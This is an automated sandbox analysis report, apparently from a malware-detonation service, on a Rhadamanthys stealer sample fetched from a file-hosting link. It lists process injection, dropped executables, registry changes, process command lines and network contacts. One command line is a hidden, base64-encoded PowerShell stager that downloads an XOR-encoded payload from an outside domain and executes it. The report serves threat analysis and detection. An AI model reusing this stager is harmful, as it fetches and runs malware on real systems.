Analysis Overview
Threat Level: Known bad
The file https://www.up-4ever.net/f81xcrmamr72 was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-11 08:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-11 08:42
Reported
2024-02-11 08:47
Platform
win10-20231215-en
Max time kernel
294s
Max time network
294s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4288 created 3084 | N/A | C:\Windows\SysWOW64\explorer.exe | c:\windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | \??\c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1604 set thread context of 4288 | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIC881.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID8B5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC98C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC9BC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA79.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{5DB33E67-8118-4AE0-A414-6B7A0AC6AB7A} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5ac808.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5ac804.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5ac804.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA3A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICB17.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID74D.tmp | C:\Windows\system32\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133521145605244619" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff86f979758,0x7ff86f979768,0x7ff86f979778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
c:\windows\system32\sihost.exe
sihost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4640 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4844 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5356 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5836 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3796 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=768 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2904 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DsSvc
C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca
C:\Users\Admin\Downloads\your_files\setup\setup.exe
"C:\Users\Admin\Downloads\your_files\setup\setup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DC89B66988FA4B04CEC0520C89FCD9D3 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\your_files\setup\setup.exe SETUPEXEDIR=C:\Users\Admin\Downloads\your_files\setup\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707400341 " AI_EUIMSI=""
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E70F789581D10F3FA049E68B56022B52
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCB71.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe
"C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAGcAbwBvAGQAMgAtAGwAZQBkAC4AYwBvAG0ALwBkAGEAcgBrADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBkACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAZwAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgBzACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1968
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.up-4ever.net | udp |
| US | 172.67.216.188:443 | www.up-4ever.net | tcp |
| US | 172.67.216.188:443 | www.up-4ever.net | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 172.67.216.188:443 | www.up-4ever.net | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | dt.betoyanracks.com | udp |
| NL | 23.109.170.34:443 | dt.betoyanracks.com | tcp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 188.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.170.109.23.in-addr.arpa | udp |
| GB | 79.133.176.252:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | gigjjgb.com | udp |
| US | 104.21.69.201:443 | gigjjgb.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
